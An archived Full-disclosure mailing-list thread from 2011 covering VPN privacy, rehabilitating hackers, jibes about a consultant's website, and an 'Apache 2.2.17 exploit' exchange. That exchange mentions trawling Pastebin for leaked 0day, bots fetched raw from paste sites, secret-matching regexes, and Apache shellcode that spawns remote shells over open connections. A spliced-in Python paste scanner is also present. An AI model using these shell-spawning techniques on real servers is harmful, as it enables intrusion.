>>> On Sat, Oct 1, 2011 at 5:50 AM,   wrote:
>>> > On Sat, 01 Oct 2011 09:16:11 +1000, xD 0x41 said:
>>> >
>>> >> As you also said, murder is a no brainer in any place...well, maybe
>>> not iraq
>>> >> or afghanistan just yet :P lol..
>>> >
>>> > Iraq, for all its problems, is still a place with a somewhat functional
>>> > judicial system. The court system may be broken, but you in general
>>> *will* at
>>> > least appear 

Re: [Full-disclosure] VPN providers and any providers in general...

2011-10-03 Thread xD 0x41
Could just look at the recent david cecil case here in .au.
It does say a lot, because he did breach some bigger networks.. and he was
committing 'smaller' scale fraud but, still fraud, however, his main problem
was what he did to a government site, which was deface it for personal gain,
not profit.
It is the latest case which would be valid of this.
still.. interesting infos... good stuff.
xd


On 3 October 2011 19:16, Darren Martyn wrote:

> Going back to my own example, say all three are first world countries, and
> A and C are in the EU whilst B is the US. All nations involved have good
> diplomatic relations and preexisting extradition treaties, and to add
> interest to it, lets say the LEO in B and C helped the investigation. The
> crimes would be non-financial, but say, large scale hacks and such. I will
> use Jake Davis's case as a "canary case" for this though...
>
> On Sun, Oct 2, 2011 at 12:31 AM, xD 0x41  wrote:
>
>> Ah, the legend of the mailing-list himself, has spoken.
>> not knowing you, for all i have seen, you're a pathetic sack of rubbish, and
>> really, what we are discussing, if you had ANY clue, which obv don't, is
>> simply how far our own freedom is going.
>> You are an idiot.
>> Have a nice day.
>> xd
>>
>>
>>
>> On 2 October 2011 08:45, andrew.wallace wrote:
>>
>>> On Sat, Oct 1, 2011 at 5:50 AM,   wrote:
>>> > On Sat, 01 Oct 2011 09:16:11 +1000, xD 0x41 said:
>>> >
>>> >> As you also said, murder is a no brainer in any place...well, maybe
>>> not iraq
>>> >> or afghanistan just yet :P lol..
>>> >
>>> > Iraq, for all its problems, is still a place with a somewhat functional
>>> > judicial system. The court system may be broken, but you in general
>>> *will* at
>>> > least appear in a courtroom with a judge and be pronounced guilty
>>> before you're
>>> > punished.
>>> >
>>> > I was actually thinking more along the lines of  totally failed states
>>> such as
>>> > Somalia, Sudan, or the contested parts of Afghanistan, where you can't
>>> be tried
>>> > for murder because there isn't a court to try you *in*.
>>> >
>>>
>>> Have you not grown old of talking to children on mailing lists?
>>>
>>> ---
>>>
>>> Andrew Wallace
>>>
>>> Independent consultant
>>>
>>> www.n3td3v.org.uk
>>>
>>
>>

Re: [Full-disclosure] Is this for real.. http://n3td3v.org.uk/

2011-10-03 Thread xD 0x41
Hi!
I did not see that bit, the frontpage was pretty shockin, for what he
proclaims to be.. he is not very pro for a 'pro' , i think his code speaks
for itself too. lol..is he trying to find some new buffer overflow, using
fonts!
perhaps.. they say a little fish can turn into a big fish overnight!
cheers,
xd


On 3 October 2011 21:39, Jacqui Caren-home wrote:

> On 02/10/2011 18:38, Stefan Jon Silverman wrote:
> > oy, list newbie meets n3td3v -- this should be fun
>
> Just looked at this site. Shudder.
>
> FYI: this is PART of one sentence!
> This site should be linked to within the wikip definition of "tag soup" :-)
>
>
>  is a professional consu
> ltancy  size="3"> size="4">
>  size="3"> size="4">
>  size="3"> size="4">
> 
>  size="4">
>  size="3"> size="4">
>  size="3"> size="4">
> 
> 
>  color="#414B56"> ize="2">
> offering business services to a wide range of clients within
> 
>  size="3"> size="4">
>  size="3"> size="4">
>  size="3"> size="4">
> 
>  color="#414B56"> ize="2">
> 
> the UK industry.
>

Re: [Full-disclosure] Is this for real.. http://n3td3v.org.uk/

2011-10-03 Thread xD 0x41
none of them exactly screams "IM A PROFESSIONAL"

No, but i don't claim to be an IT security pro, either.
My site, is a personal, crappy lil blog, nothing more than a tool for me.
it is the first posts i have made to it, in over 4yrs of it up :P
so i am not really, one huge on self promotion..
so, i don't really care, my site, was home made templates for some of it, so,
it is to learn how to use adobe photoshop better, a chance for me to learn,
nothing more. this was never about my site.
it was about him, picking on the whole notion, of freedom to speak and
express oneself, and promoting things such as arresting people, ridiculous.
xd


On 3 October 2011 22:13, doc mombasa  wrote:

> i dont think either one of you have nice sites
> none of them exactly screams "IM A PROFESSIONAL"
> quite the contrary..
>
> 2011/10/3 xD 0x41 
>
>> Hi!
>> I did not see that bit, the frontpage was pretty shockin, for what he
>> proclaims to be.. he is not very pro for a 'pro' , i think his code speaks
>> for itself too. lol..is he trying to find some new buffer overflow, using
>> fonts!
>> perhaps.. they say a little fish can turn into a big fish overnight!
>> cheers,
>> xd
>>
>>
>>
>> On 3 October 2011 21:39, Jacqui Caren-home wrote:
>>
>>> On 02/10/2011 18:38, Stefan Jon Silverman wrote:
>>> > oy, list newbie meets n3td3v -- this should be fun
>>>
>>> Just looked at this site. Shudder.
>>>
>>> FYI: this is PART of one sentence!
>>> This site should be linked to within the wikip definition of "tag soup"
>>> :-)
>>>
>>>
>>>  is a professional consu
>>> ltancy >> size="3">>> size="4">
>>> >> size="3">>> size="4">
>>> >> size="3">>> size="4">
>>> 
>>> >> size="3">
>>> >> size="3">>> size="4">
>>> >> size="3">>> size="4">
>>> 
>>> 
>>> >> color="#414B56">>> ize="2">
>>> offering business services to a wide range of clients within
>>> 
>>> >> size="3">>> size="4">
>>> >> size="3">>> size="4">
>>> >> size="3">>> size="4">
>>> 
>>> >> color="#414B56">>> ize="2">
>>> 
>>> the UK industry.
>>>

Re: [Full-disclosure] VPN providers and any providers in general...

2011-10-03 Thread xD 0x41
Ok.. my final posts on this matter i think... and opinions,

(No, seriously, I wonder what your opinions are on rehabilitative rather
than punitive measures to be taken against criminal hackers, assuming
fraud was *not* involved, and what benefit they can be to the community and
whether it outweighs the negative effects of not making examples of them).

It does outweigh, for, each time a person is jailed it costs you, me, and
anyone who works, money.
We can reduce the harm, by education and counselling. Especially forced
hours per-week basis, of counselling with a qualified psych, possibly before
release even better.
I think the IQ level is higher, therefore, there is a 'smarter' chance of it
happening, as much as they're hacking, they're also gaining tremendous knowledge,
many do go into IT sec, we just cannot see those cases really..and when we
do, they're usually yrs after the thing has happened, but, i could think of a
few EU based guys who are happily working for huge co's, making massive cash,
even maker of Morphine, HolyFather, admittedly went into Av, and made
rootkits for years.
So, for sure, why put them in jail, it is just going to 'harden' , like
anyone will when one's back is up against the wall, as it will be in jail
ofc.
I think rehab, rather than retaliate.

Bedtime here for me :)
I enjoy your posts, and i think the whole topic has much merit in these
lists, other than just about a cpl of websites, people forget that it is
still about, the freedom to even, do a simple pentest , really that's the
crux of it.

So, i think, some method used by psychology, could very easily work,
especially because, these guys are usually VERY smart, and, they can still be
'saved' unlike some hardened armed-robber/burglar...
The chance of rehab, is specially high because of the intellectual platform
it takes just to be at a simple or mediate level of the scale, in terms of
'hacking' in general.
cheers,
xd



On 3 October 2011 22:17, Darren Martyn wrote:

> Thanks for the input, I will be putting this as a debate soon for the Law
> Society in the Uni I attend, to see what the legal guys think.
>
> The issue in the example is not fraud, but damage done to the servers (lets
> assume root/deface) and perhaps leaking of stolen data - the case I am using
> as an example would be, for example, the "LulzSec" breaches. How hard would
> they get f*cked on an international scale if arrested? How many countries
> will try extradite them?
>
> In my opinion, they should be simply charged, tried and convicted in their
> country of residence and be done with it - there is no benefit to society as
> a whole to be gained from hanging them three or four times a piece, as I
> reckon given a good shock and such, they come out with a newfound respect
> for authority and may even be of some benefit to the security community and
> the community as a whole. Locking them up merely turns them further toward
> criminal lives - and remember, all hackers *have* potential to do good as
> well as evil, it is just a matter of their choice. Given a *shove* toward
> the right decision is more beneficial in the end.
>
> "Discuss"...
>
> (No, seriously, I wonder what your opinions are on rehabilitative rather
> than punitive measures to be taken against criminal hackers, assuming
> fraud was *not* involved, and what benefit they can be to the community and
> whether it outweighs the negative effects of not making examples of them).
>
> On Mon, Oct 3, 2011 at 9:34 AM, xD 0x41  wrote:
>
>> Could just look at the recent david cecil case here in .au.
>> It does say a lot, because he did breach some bigger networks.. and he was
>> committing 'smaller' scale fraud but, still fraud, however, his main problem
>> was what he did to a government site, which was deface it for personal gain,
>> not profit.
>> It is the latest case which would be valid of this.
>> still.. interesting infos... good stuff.
>> xd
>>
>>
>> On 3 October 2011 19:16, Darren Martyn > > wrote:
>>
>>> Going back to my own example, say all three are first world countries,
>>> and A and C are in the EU whilst B is the US. All nations involved have good
>>> diplomatic relations and preexisting extradition treaties, and to add
>>> interest to it, lets say the LEO in B and C helped the investigation. The
>>> crimes would be non-financial, but say, large scale hacks and such. I will
>>> use Jake Davis's case as a "canary case" for this though...
>>>
>>> On Sun, Oct 2, 2011 at 12:31 AM, xD 0x41  wrote:
>>>
>>>> Ah, the legend of the mailing-list himself, has spoken.
>>>> not knowing you, for all i have seen, your a pathetic sack of rubbish,
>

Re: [Full-disclosure] VPN providers and any providers in general...

2011-10-03 Thread xD 0x41
Well, statistics show that most crime is done on some form of drug, and drug
addiction is probably about 90% of most major crime events, so, i think this
gives people of the IT nature, a much higher chance, statistically speaking,
it would be of more benefit to simply rehab them, rather than make them a
possible statistic of the 'rotation' count most harder crims have.
ok.. i'm out!
xd


On 3 October 2011 22:38, Darren Martyn wrote:

> Well, thanks for the logical response :)
>
> Many people want these "evil hackers" locked up and such, but doing so will
> only achieve the following (in my opinion):
> A: Cost money.
> B: Turn them into a more hardened criminal.
> C: Cost the community a useful person who could be beneficial to them.
>
> Consider that Davis is 18, Cleary only 19, and other people arrested are
> about the same age. What the law enforcement and judicial bodies dealing
> with them must realize is that they are dealing with intelligent young
> people, who simply chose the wrong path. What they need is not a prison
> stay, but some rehabilitative treatment, perhaps counselling to help them
> find the right path, and a better sense of morality.
>
> Hell, in some cases the mere arrest itself scared people straight. Having a
> bloody SWAT team blow the bloody doors off is enough to reangline* most
> young mens moral compass!
>
> Of course, jailing them can be used to "send a message" that "this is not
> acceptable" and such, but that has *less* merit than *using* them for good.
> All one does by sending a message is make those still out there feel more
> persecuted, and persecuted people lash out, doing more damage, and the cycle
> continues.
>
> *This computers spellcheck is not working, it wants to use Cyrillic!
>
> On Mon, Oct 3, 2011 at 12:28 PM, xD 0x41  wrote:
>
>> Ok.. my final posts on this matter i think... and opinions,
>>
>>
>> (No, seriously, I wonder what your opinions are on rehabilitative rather
>> than punitive measures to be taken against criminal hackers, assuming
>> fraud was *not* involved, and what benefit they can be to the community and
>> whether it outweighs the negative effects of not making examples of them).
>>
>> It does outweigh, for, each time a person is jailed it costs you, me, and
>> anyone who works, money.
>> We can reduce the harm, by education and counselling. Especially forced
>> hours per-week basis, of counselling with a qualified psych, possibly before
>> release even better.
>> I think the IQ level is higher, therefore, there is a 'smarter' chance of
>> it happening, as much as they're hacking, they're also gaining tremendous
>> knowledge, many do go into IT sec, we just cannot see those cases really..and
>> when we do, they're usually yrs after the thing has happened, but, i could
>> think of a few EU based guys who are happily working for huge co's, making
>> massive cash, even maker of Morphine, HolyFather, admittedly went into Av,
>> and made rootkits for years.
>> So, for sure, why put them in jail, it is just going to 'harden' , like
>> anyone will when one's back is up against the wall, as it will be in jail
>> ofc.
>> I think rehab, rather than retaliate.
>>
>> Bedtime here for me :)
>> I enjoy your posts, and i think the whole topic has much merit in these
>> lists, other than just about a cpl of websites, people forget that it is
>> still about, the freedom to even, do a simple pentest , really that's the
>> crux of it.
>>
>> So, i think, some method used by psychology, could very easily work,
>> especially because, these guys are usually VERY smart, and, they can still be
>> 'saved' unlike some hardened armed-robber/burglar...
>> The chance of rehab, is specially high because of the intellectual
>> platform it takes just to be at a simple or mediate level of the scale, in
>> terms of 'hacking' in general.
>> cheers,
>> xd
>>
>>
>>
>>
>> On 3 October 2011 22:17, Darren Martyn > > wrote:
>>
>>> Thanks for the input, I will be putting this as a debate soon for the
>>> Law Society in the Uni I attend, to see what the legal guys think.
>>>
>>> The issue in the example is not fraud, but damage done to the servers
>>> (lets assume root/deface) and perhaps leaking of stolen data - the case I am
>>> using as an example would be, for example, the "LulzSec" breaches. How hard
>>> would they get f*cked on an international scale if arrested? How many
>>> countries will try extradite them?
>>>
>>> In my opinion, they should be simply 

Re: [Full-disclosure] VPN providers and any providers in general...

2011-10-03 Thread xD 0x41
Nice.
Oh, i did not mean hackers and drugs, they are not really what I classify as
a hardcore, criminalised addict who is now at the point where the drug runs
them... most hard non-pc crimes, are this way.
Although, i know of many many people who abuse benzodiazepines, and that's
where it can get only a bit tricky to *speak* with them ;p , however, this
does not classify to me, as a harder type, who would rip that computer
outta your hand and take it to sale!
That's the crims i mean, and that's the reason why PC users have a much higher
chance to not be any kind of 'repeat' addict... simply just they are not
running around, daily, robbing things and people, (how would they use a
pc...) and many actually, work at places.
So, it is a rather good area to look at, because the chances of rehabbing a
PC/IT user, is much much better than any harder criminal who has done say,
20yrs of their life (out of 25 yrs on earth), behind jail bars.
Anyhow, i think a lot of hackers do *abuse* but, not addicted, to drugs, which
makes me wonder why they do it, some i know, have to for medical reasons,
and know this, and when under influence, usually jump offline or stay afk
a bit..
Some, just abuse at a low level with pills, but if you were to count IV
users amongst hackers vs IV users amongst the public/crime scenes there,
then you would have a very different sizing.
Is good reading to look at a few cases, regarding drugged people committing
crimes, and compare the statistics to the turn-about with jail, which is
probably 99% amongst the hardcore crims, rotation rate*.
Anyhow, cheers!
xd


On 4 October 2011 01:10, Darren Martyn wrote:

> Nothing "wrong" with it per se, I was known to enjoy large bottles of rum
> during extended coding sessions. Now I can attest to the massive fall-off in
> "epic skillz" associated with too much alcohol - my code starts OK, gets
> better, then becomes an epic mess of typos. I stopped doing that a while
> back as I realized that it impaired my judgement too much.
>
> Computer crimes are far easier to commit when ones judgement is
> sufficiently impaired - a lot of people I used to associate with took some
> form of intoxicant and claimed it made them a "better hacker". (cannabis
> often being one of the drugs of choice, some claim it allowed them to
> "visualize" it all better...). I personally reckon that the real reason for
> this is that it makes it easier to ignore the fact you are doing something
> "wrong".
>
> TL;DR, intoxicants + misguided computer hackers = bad.
>
> On Mon, Oct 3, 2011 at 3:36 PM, Laurelai  wrote:
>
>> On 10/3/2011 4:56 AM, Darren Martyn wrote:
>> > True, I know some hackers who really apply the "Ballmers Peak"
>> > (http://xkcd.com/323/) principle... They simply need to dry up :)
>> >
>> Yeah i know quite a few of those myself.
>>

Re: [Full-disclosure] Apache 2.2.17 exploit?

2011-10-03 Thread xD 0x41
Hrm interesting.. I do Index of "/what-i-am-after" , in some different ways
and usually, find many 'dumps' of interesting scanners/kits/whatever.. have
not read most of it...archived tars now.. anyhow... interesting to maybe
make a 'catcher' for these things, i was once trying to do a sniffer for
putty logins, but it failed :(
Anyhow, i like the regex idea. nice.
xd


On 4 October 2011 01:46, Dan Dart  wrote:

> > I regularly trawl Pastebin.com to find code - often idiots leave some
> 0day
> > and similar there and it is nice to find.
>
> Make an RSS feed to regex through everything for "interesting" stuff..
>
> Maybe:
> /^[0-9a-f]{32}$/
>
> Or:
> /nuclear weapons/
>
> Or even:
> /^ssh-rsa/
>
> Would be brilliant!
>
>
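
The regex idea from Dan Dart's post, as an added example (not code from the thread or from any poster), applied to paste text a defender is monitoring for leaked material. It uses the two structured patterns as posted and shows that the `^`/`$` anchors only match per line under `re.MULTILINE` and that CRLF line endings must be normalised first; `scan_paste`, `PATTERNS` and `SAMPLE` are names assumed here, and the sample paste is constructed.

```python
import re

# The two structured patterns quoted in the thread, kept exactly as posted.
PATTERNS = {
    "hex32": r"^[0-9a-f]{32}$",       # 128-bit hex digest on a line of its own
    "ssh_rsa_pubkey": r"^ssh-rsa",    # OpenSSH RSA public key line
}

# Constructed sample paste (not real data); CRLF line endings on purpose.
SAMPLE = (
    "dump from db\r\n"
    "0123456789abcdef0123456789abcdef\r\n"
    "user: alice 0123456789abcdef0123456789abcdef\r\n"
    "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC7 constructed@example\r\n"
)


def scan_paste(text, multiline=True):
    """Return sorted (line_no, pattern_name, redacted_preview) tuples."""
    # A CR left before the LF would sit between the digest and '$' and hide
    # the hit, so normalise line endings before matching.
    text = text.replace("\r\n", "\n")
    # Without MULTILINE, '^' and '$' only anchor to the start and end of the
    # whole paste, so the patterns as posted miss anything past line 1.
    flags = re.MULTILINE if multiline else 0
    findings = []
    for name, pattern in PATTERNS.items():
        for m in re.finditer(pattern, text, flags):
            line_no = text.count("\n", 0, m.start()) + 1
            # Keep only a short prefix so the alert log does not itself
            # become a copy of the leaked value.
            preview = m.group(0)[:4] + "..."
            findings.append((line_no, name, preview))
    return sorted(findings)


if __name__ == "__main__":
    for hit in scan_paste(SAMPLE):
        print(hit)
    # Same input, anchors applied to the whole paste: nothing is found.
    print(scan_paste(SAMPLE, multiline=False))
```

Line 3 of the sample is deliberately not reported: the digest there is embedded in other text, which the fully anchored pattern from the thread does not cover.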

Re: [Full-disclosure] Is this for real.. http://n3td3v.org.uk/

2011-10-03 Thread xD 0x41
Reminds me of Front Page 2.0 gen'd code.

lol, very true... it and a few other apps for web building, seem to do these
kind of muckups or rather, just tag in an idiotic manner...
pretty weird, I just stick with WP and hope i ain't vuln ;p
cheers,
xd


On 3 October 2011 23:39, Dave  wrote:

> On 03/10/2011 11:39, Jacqui Caren-home wrote:
> > On 02/10/2011 18:38, Stefan Jon Silverman wrote:
> >> oy, list newbie meets n3td3v -- this should be fun
> >
> > Just looked at this site. Shudder.
> >
> > FYI: this is PART of one sentence!
> > This site should be linked to within the wikip definition of "tag soup"
> :-)
> >
> >
> >  is a professional consu
> > ltancy  size="3"> > size="4">
> >  size="3"> > size="4">
> >  size="3"> > size="4">
> > 
> >  size="3">
> >  size="3"> > size="4">
> >  size="3"> > size="4">
> > 
> > 
> >  color="#414B56"> > ize="2">
> > offering business services to a wide range of clients within
> 
> >  size="3"> > size="4">
> >  size="3"> > size="4">
> >  size="3"> > size="4">
> > 
> >  color="#414B56"> > ize="2">
> > 
> > the UK industry.
> >
>
> Reminds me of Front Page 2.0 gen'd code.
>

Re: [Full-disclosure] Apache 2.2.17 exploit?

2011-10-04 Thread xD 0x41
and i will find you :)

he obv has a sshd scanner ready+waiting :)
there is code tho... just NOT that 1.
xd


On 4 October 2011 01:54, adam  wrote:

> /* KEEP PRIV8&!&! leak and i will find you :) ~ desg */
> *
> *
> Probably should have been a good indication that he *wanted* you to run
> it.
>

Re: [Full-disclosure] VPN providers and any providers in general...

2011-10-04 Thread xD 0x41
maybe they are law abiding companies? :)

Who were advertising themselves, and acting like they would NEVER do the
dirty by handing over any payment records etc... which is half the reason i
believe the people use those ones, advertising to protect you.. not to give
your infos up, for really, no reason. as they did.
Law abiding or not, then they should be advertising as a law abiding
company, and not acting like some hackers-paradise vpn service.
xd


On 4 October 2011 06:16, Ferenc Kovacs  wrote:

> On Mon, Oct 3, 2011 at 10:35 PM, Laurelai  wrote:
> > On 10/3/2011 10:42 AM, Antony widmal wrote:
> >> Using an external VPN provider to cover your trace clearly shows your
> >> incompetency and your idiot assumption.
> >> Trying to blame the VPN provider rather than accepting your mistake
> >> and learning from it clearly show your 3 years old mentality.
> >>
> >> Also, could you please stop posting as GLOW Xd as well ?
> >> We do not need your schizophrenic script kiddie "lolololol", "xD",
> >> hugs,  spamming on this mailing list.
> >>
> >> You being on this mailing list is once again not the best idea.
> >>
> >> Thanks,
> >> Antony
> > Actually XD and me are two different people. Second issues of privacy
> > are always relevant, not understanding that law abiding individuals
> > should always be concerned about companies that hand over personal info
> > at the request of an authority figure are the ones with three year old
> > mentalities.
>
> maybe they are law abiding companies? :)
> this whole fuss wouldn't have happened, if everybody could just stay a
> law abiding citizen.
>
> --
> Ferenc Kovács
> @Tyr43l - http://tyrael.hu
>

Re: [Full-disclosure] Apache 2.2.17 exploit?

2011-10-04 Thread xD 0x41
There are places like codepad.org that let you compile/execute various


Indeed, i have seen the codepad.org execute action used on many many bots,
even pastebin just using download= and, renaming the downloaded file :s not
too hard, dont even need to rename file, and, raw= features, is plain code
just in a txt.
on codepad tho, you can actually execute the code on the server, and, thats
awesome for debugging i guess but, i prefer to use my own stdinout.
anyhow, it is a nice world there, that is where half the bots in use sit...
you should find some of the more popular botz, and strings, and watch
how many are active...many would be, believe it. specially on pastebin and
codepad , those two are best because allow raw download.. but, codepad,
even allows you to setup a subdomain which was removed from the pastebin ,
unf..
ohwell, thats how it is, it is ok by me.
xd


On 4 October 2011 07:14, adam  wrote:

> Darren,
>
> There are places like codepad.org that let you compile/execute various
> programming/scripting languages, of course you don't have the control/access
> that you'd normally have but for some things - it may just be enough.
>
> On Mon, Oct 3, 2011 at 11:41 AM, Darren Martyn <
> d.martyn.fulldisclos...@gmail.com> wrote:
>
>> I may have to set up such an RSS + REGEX along with a google alerts to get
>> the best of both :)
>>
>> Since my lack of computing facilities has gotten worse in the last month I
>> have actually begun to forget ASM, so decoding shellcode is not so easy for
>> me :(
>> Nor do I have (currently) access to a Linux box to test it on - only a
>> friends W7 laptop (which wants to use Cyrillic) and the college computers
>> (W7 also... Network booting with Novell, buggy and slow for the win!)
>>
>> I will keep on posting anything that looks even mildly interesting, may
>> find something fun in my travels :)
>>
>>
>> On Mon, Oct 3, 2011 at 5:05 PM, PsychoBilly  wrote:
>>
>>> OMG!
>>> This ...
>>> actually WORKS!
>>> GR8 Job, m8+!
>>> L33+ cC l33+
>>> W00+ FB Bwana!
>>> ...
>>> 
>>>
>>> [[   adam   ]] @ [[   03/10/2011 17:56
>>> ]]--
>>> > Also, make sure you guys don't miss out on this 0day either:
>>> http://pastebin.com/R8XdsUgK
>>> >
>>>

Re: [Full-disclosure] VPN providers and any providers in general...

2011-10-04 Thread xD 0x41
You are an idiot.


On 4 October 2011 04:42, Antony widmal  wrote:

> Using an external VPN provider to cover your trace clearly shows your
> incompetency and your idiot assumption.
> Trying to blame the VPN provider rather than accepting your mistake and
> learning from it clearly show your 3 years old mentality.
>
> Also, could you please stop posting as GLOW Xd as well ?
> We do not need your schizophrenic script kiddie "lolololol", "xD", hugs,
>  spamming on this mailing list.
>
> You being on this mailing list is once again not the best idea.
>
> Thanks,
> Antony
>

Re: [Full-disclosure] VPN providers and any providers in general...

2011-10-04 Thread xD 0x41
Honestly, i dont use VPN, dont know a lot about them, but when a company says
" we will hide you..come to us.. " , i guess some people take this, as a
meaning that they can commit crime, which is obviously not the case... I dont
use VPN, I dont believe in them, i dont need them, and, I am NOT laurelai
for the final time i will say to that idiotic kid trying to say i am, I do
not speak in "lololo" , and anyone who knows me, would know i aint her/him,
whoever it is.
Anyhow, yes, well... i am slowly seeing that obviously, appearances can be
very deceiving , but then again, I would not expect to get away with crime
on *any* service nowadays, it is crime after all... and it is on the grander
scale, according to press even, which pushes it forward even harder..
anyhow, nite time here, sleeping time... but i will wake to a million emails
i guess again :s it is a good topic, but also not an excuse for people to
start putting up "free *blah*" and such, because some of these cases simply
CANNOT be helped, by law... thats just how it is in some countries, they are
stricter (once arrested), than when i guess some other countries are..
regarding europe, and arabic areas, and the jails there... i can only say,
each case must be looked at very closely, and then maybe see why in each
case, the arrest was made, and maybe there is some pattern... (the
press...mainly).
cheers,and gnite,
xd


On 4 October 2011 20:27, Darren Martyn wrote:

> Ok, well I suppose we can avoid spamming the list with our off topic
> ramblings and get back to the topic on hand (and behave like adults, which I
> assume all of you'se are), and clear up a few things up.
>
> VPN's and such can serve as a method to stop people on the local network
> from sniffing your connection (assuming a reliable encryption scheme is in
> place, and you have not been MITM-ed during the key exchange or whatever -
> crypto is NOT my interest!). However, we can reliably assume that the VPN
> provider can sniff your connection and compromise your "safety" per se, and
> that they WILL cooperate with Law Enforcement.
>
> Even running your own VPN (OpenVPN) on a VPS you purchase is still risky,
> as the VPS provider can simply take over the box. Etc.
>
> TL;DR, VPN's are not as safe as some believe for protecting ones anonymity.
> They WILL roll over for LEO and such. Not to mention threats on the LAN
> could compromise you, but I do not know much about how that works on the
> crypto side (however, if someone wants to enlighten me I would be grateful,
> it has piqued my curiosity!)
>
> Also, NOT surprised the provider rolled over in THAT case.
>
> *footnote for Christian, etc. I apologise for inciting a bit of off topic
> ranting, merely discussing morals, and how they affect people, and how often
> people do silly things when their logic/morality is compromised, often by
> narcotics and such. But that is for a discussion on morals and the
> psychology/sociology of "cybercriminals". The ensuing debate about
> psychedelics and coding was probably my fault, but hey, people have varied
> interests, no? If we are going to act our age (adults, I presume) on this
> list at least display some tolerance for other peoples discussions, and keep
> the anger off the list.
>
> On Tue, Oct 4, 2011 at 8:06 AM, Ferenc Kovacs  wrote:
>
>> http://vpn.hidemyass.com/vpncontrol/legal.html
>>
>> "VPN Data
>>
>> What we store: Time stamp and IP address when you connect and
>> disconnect to our service."
>>
>> ...
>>
>> "Legalities
>>
>> Anonymity services such as ours do not exist to hide people from
>> illegal activity. We will cooperate with law enforcement agencies if
>> it has become evident that your account has been used for illegal
>> activities."
>>
>> people should read the TOC, AUP and privacy policy especially if they
>> are planning to use that service for illegal activities.
>>
>> As I mentioned before it is hard to expect that a VPN provider will
>> risk his company for your $11.52/month, and maybe they would try it
>> for some lesser case, but what Lulsec did was grant, so I'm not
>> surprised that they bent.
>>
>> On Tue, Oct 4, 2011 at 1:09 AM, xD 0x41  wrote:
>> > maybe they are law abiding companies? :)
>> >
>> > Who were advertising themselves, and acting like they would NEVER do the
>> > dirty by handing over any payment records etc... wich is half the reason
>> i
>> > believe the people use theose ones, advertising to protect you.. not to
>> give
>> > your infos up, for really, no reason. as they did.
>> > Law abiding or not, then they should be advertising as a l

Re: [Full-disclosure] VPN providers and any providers in general...

2011-10-04 Thread xD 0x41
On the piratebay.org dilemma for isps, i found this posted just *now*
(10pm,australian time)

Belgian ISPs Ordered To Block The Pirate Bay -
http://feed.torrentfreak.com/~r/Torrentfreak/~3/FMfrUHk1sZM/

Interesting developments regarding this.. I am using the RSS feed on TF to
keep up with this case, seems it has taken a sharp u-turn!
heads up!
xd



On 4 October 2011 18:06, Ferenc Kovacs  wrote:

> http://vpn.hidemyass.com/vpncontrol/legal.html
>
> "VPN Data
>
> What we store: Time stamp and IP address when you connect and
> disconnect to our service."
>
> ...
>
> "Legalities
>
> Anonymity services such as ours do not exist to hide people from
> illegal activity. We will cooperate with law enforcement agencies if
> it has become evident that your account has been used for illegal
> activities."
>
> people should read the TOC, AUP and privacy policy especially if they
> are planning to use that service for illegal activities.
>
> As I mentioned before it is hard to expect that a VPN provider will
> risk his company for your $11.52/month, and maybe they would try it
> for some lesser case, but what Lulsec did was grant, so I'm not
> surprised that they bent.
>
> On Tue, Oct 4, 2011 at 1:09 AM, xD 0x41  wrote:
> > maybe they are law abiding companies? :)
> >
> > Who were advertising themselves, and acting like they would NEVER do the
> > dirty by handing over any payment records etc... wich is half the reason
> i
> > believe the people use theose ones, advertising to protect you.. not to
> give
> > your infos up, for really, no reason. as they did.
> > Law abiding or not, then they should be advertising as a law abiding
> > company, and not acting like some hackers-oparadise vpn service.
> > xd
> >
> >
> > On 4 October 2011 06:16, Ferenc Kovacs  wrote:
> >>
> >> On Mon, Oct 3, 2011 at 10:35 PM, Laurelai 
> wrote:
> >> > On 10/3/2011 10:42 AM, Antony widmal wrote:
> >> >> Using an external VPN provider to cover your trace clearly shows your
> >> >> incompetency and your idiot assumption.
> >> >> Trying to blame the VPN provider rather than accepting your mistake
> >> >> and learning from it clearly show your 3 years old mentality.
> >> >>
> >> >> Also, could you please stop posting as GLOW Xd as well ?
> >> >> We do not need your schizophrenic script kiddie "lolololol", "xD",
> >> >> hugs,  spamming on this mailing list.
> >> >>
> >> >> You being on this mailing list is once again not the best idea.
> >> >>
> >> >> Thanks,
> >> >> Antony
> >> > Actually XD and me are two different people. Second issues of privacy
> >> > are always relevant, not understanding that law abiding individuals
> >> > should always be concerned about companies that hand over personal
> info
> >> > at the request of an authority figure are the ones with three year old
> >> > mentalities.
> >>
> >> maybe they are law abiding companies? :)
> >> this whole fuss wouldn't have happened, if everybody could just stay a
> >> law abiding citizen.
> >>
> >> --
> >> Ferenc Kovács
> >> @Tyr43l - http://tyrael.hu
> >>
> >
>
>
>
> --
> Ferenc Kovács
> @Tyr43l - http://tyrael.hu
>

Re: [Full-disclosure] Apache 2.2.17 exploit?

2011-10-04 Thread xD 0x41
Are there any ideas how to make the code more robust (currently
raciness due to frequent syscalls is problematic), smaller or add
features (I thought using the libc GOT, but this made code larger and
I do not know if that would make code much more portable)?

What about using libcurl/curlsetopt_url and the other curl options





On 5 October 2011 08:26, halfdog  wrote:

> -BEGIN PGP SIGNED MESSAGE-
> Hash: SHA1
>
> Just for those, who want to build their own apache shell code for
> testing purposes, this snip might be of some use. It uses the still
> open tcp connections to the server to spawn the shells, so that no
> backconnect is needed. Of course, it does not give remote root but
> only httpd user privs. And you should send "exec 1>&0" as first
> command if you want to see remote shell stdout.
>
>
> Are there any ideas how to make the code more robust (currently
> raciness due to frequent syscalls is problematic), smaller or add
> features (I thought using the libc GOT, but this made code larger and
> I do not know if that would make code much more portable)?
>
>
> PS: There is no use to compile or run it, it is just embedded into .c
> file for compilation (too lazy to look up gcc args for .S assem)
> before insertion into vectors.
>
> - --
> http://www.halfdog.net/
> PGP: 156A AE98 B91F 0114 FE88  2BD8 C459 9386 feed a bee
> -BEGIN PGP SIGNATURE-
> Version: GnuPG v1.4.6 (GNU/Linux)
>
> iD8DBQFOi3nbxFmThv7tq+4RAv8cAJ4tR3T2Ssx8SOYr5eDqX5OYqNyhmgCfbjd1
> f9X896pIjKEn/l/3ZLv1Ha8=
> =5K0l
> -END PGP SIGNATURE-
>

Re: [Full-disclosure] VPN providers and any providers in general...

2011-10-04 Thread xD 0x41
Supporting it would then mean, i guess there would be some kind of neat
cyber attacks happening on
wall street major shareholders :P or  is it peaceful, sit in like this time
;P
hehe..



On 5 October 2011 01:34, Laurelai Storm  wrote:

> I believe they are supporting it.
> On Oct 4, 2011 9:29 AM, "Georgi Guninski"  wrote:
> > On Mon, Oct 03, 2011 at 02:22:42PM -0700, Laurelai wrote:
> >> What tears? I don't even use those providers.
> >
> > What a nice drivel in this thread :)))
> >
